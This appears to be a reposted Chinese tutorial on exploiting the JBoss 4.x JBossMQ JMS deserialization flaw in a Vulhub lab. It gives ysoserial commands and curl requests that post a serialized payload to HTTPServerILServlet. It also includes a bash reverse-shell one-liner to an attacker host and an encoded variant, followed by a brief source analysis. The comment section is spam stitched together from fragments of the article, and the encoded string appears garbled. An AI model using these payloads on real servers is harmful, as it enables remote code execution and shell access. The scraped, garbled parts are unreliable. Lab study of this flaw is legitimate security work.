您现在的位置是:首页 > 编程 > 

JBoss 4.x JBossMQ JMS反序列化

2025-07-19 13:07:13
JBoss 4.x JBossMQ JMS反序列化 影响范围JBoss AS <=4.x漏洞概述在JBoss AS 4.x及之前版本的JbossMQ实现过程中,JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可构造序列化数据利用该漏洞来执行任意代码并获取服务器端的权限环境搭建在这里我们使用Vulhu

JBoss 4.x JBossMQ JMS反序列化

影响范围

JBoss AS <=4.x

漏洞概述

在JBoss AS 4.x及之前版本的JbossMQ实现过程中,JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可构造序列化数据利用该漏洞来执行任意代码并获取服务器端的权限

环境搭建

在这里我们使用Vulhub来构建环境:

代码语言:javascript代码运行次数:0运行复制
docker compose up -d

环境启动后访问地址为:

代码语言:javascript代码运行次数:0运行复制
http://your-ip:8080
命令执行

漏洞存在该路径下/jbossmq-httpil/HTTPServerILServlet

Step 1:创建文件

利用在线载荷生成工具生成载荷:

代码语言:javascript代码运行次数:0运行复制
#构造载荷
java -jar ysoserial.jar CommCollecti5 'touch /tmp/success.sh' > 2.ser

#执行载荷
curl http://192.168.204.17:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @2.ser --output 
反弹Shell

随后使用ysoserial.jar工具进行利用:

Step 1:首先生成要反弹shell的载荷(注意这里的输入输出重定向方向哦"<&1",即将输入输出全部重定向到远程主机,反向shell)

代码语言:javascript代码运行次数:0运行复制
/bin/bash -i >& /dev/tcp/192.168.204.144/4444<&1
代码语言:javascript代码运行次数:0运行复制
bash -c {echo,L2Jpbi9iYXoIC1pID4mIC9kZXYvdGwLzE5Mi4xjguMjA0LjE0C80DQ0PCYx}|{base64,-d}|{bash,-i}

Step 2:使用ysoserial生成反序列化载荷

代码语言:javascript代码运行次数:0运行复制
java -jar ysoserial.jar CommCollecti5 "bash -c {echo,L2Jpbi9iYXoIC1pID4mIC9kZXYvdGwLzE5Mi4xjguMjA0LjE0C80DQ0PCYx}|{base64,-d}|{bash,-i}" > 1.ser

Step :使用CURL发送请求并成功收到反弹的shell

代码语言:javascript代码运行次数:0运行复制
curl http://192.168.204.17:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser --output 
漏洞分析

从docker中提取整个Jboss文件到本地:

代码语言:javascript代码运行次数:0运行复制
docker cp 4f5a65ca980:/opt/jboss /home/jboss

压缩文件夹

代码语言:javascript代码运行次数:0运行复制
zip -r jboss.zip jboss

随后解压后使用IDEA打开

紧接着我们来到server/default/deploy/jms/jbossmq-httpil.sar/jbossmq-httpil.war/WEB-IF/web.xml

随后跟进到类org.il.http.servlet.HTTPServerILServlet,此时如果是POST传递的话,会触发processRequest方法

随后可以看到这里会进行一次反序列化操作,存在反序列化漏洞:

代码语言:javascript代码运行次数:0运行复制
/jbossmq-httpil/HTTPServerILServlet/*
参考链接

本文参与 腾讯云自媒体同步曝光计划,分享自。原始发表:2025-01-21,如有侵权请联系 cloudcommunity@tencent 删除jbossjms漏洞序列化重定向

#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格

本文地址:http://www.dnpztj.cn/biancheng/1141536.html

相关标签:无
上传时间: 2025-07-19 07:29:50
留言与评论(共有 14 条评论)
本站网友 济宁房产
2分钟前 发表
/opt/jboss /home/jboss压缩文件夹代码语言:javascript代码运行次数:0运行复制zip -r jboss.zip jboss随后解压后使用IDEA打开紧接着我们来到server/default/deploy/jms/jbossmq-httpil.sar/jbossmq-httpil.war/WEB-IF/web.xml随后跟进到类org.il.http.servlet.HTTPServerILServlet
本站网友 跌打损伤
21分钟前 发表
远程攻击者可构造序列化数据利用该漏洞来执行任意代码并获取服务器端的权限环境搭建在这里我们使用Vulhub来构建环境:代码语言:javascript代码运行次数:0运行复制docker compose up -d环境启动后访问地址为:代码语言:javascript代码运行次数:0运行复制http
本站网友 赵晋
8分钟前 发表
-i}Step 2:使用ysoserial生成反序列化载荷代码语言:javascript代码运行次数:0运行复制java -jar ysoserial.jar CommCollecti5 "bash -c {echo
本站网友 鸽子蛋的营养成分
22分钟前 发表
即将输入输出全部重定向到远程主机
本站网友 七彩云天
17分钟前 发表
L2Jpbi9iYXoIC1pID4mIC9kZXYvdGwLzE5Mi4xjguMjA0LjE0C80DQ0PCYx}|{base64
本站网友 为什么视频打不开
15分钟前 发表
分享自
本站网友 农夫山泉有点咸
10分钟前 发表
//your-ip
本站网友 刘汉案
19分钟前 发表
反向shell)代码语言:javascript代码运行次数:0运行复制/bin/bash -i >& /dev/tcp/192.168.204.144/4444<&1代码语言:javascript代码运行次数:0运行复制bash -c {echo
本站网友 刘春
6分钟前 发表
-d}|{bash
本站网友 北京小客车摇号结果查询
11分钟前 发表
JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞
本站网友 chinaren
30分钟前 发表
原始发表:2025-01-21
本站网友 欧瑞强
14分钟前 发表
存在反序列化漏洞:代码语言:javascript代码运行次数:0运行复制/jbossmq-httpil/HTTPServerILServlet/*参考链接本文参与 腾讯云自媒体同步曝光计划
本站网友 建邦集团
25分钟前 发表
即将输入输出全部重定向到远程主机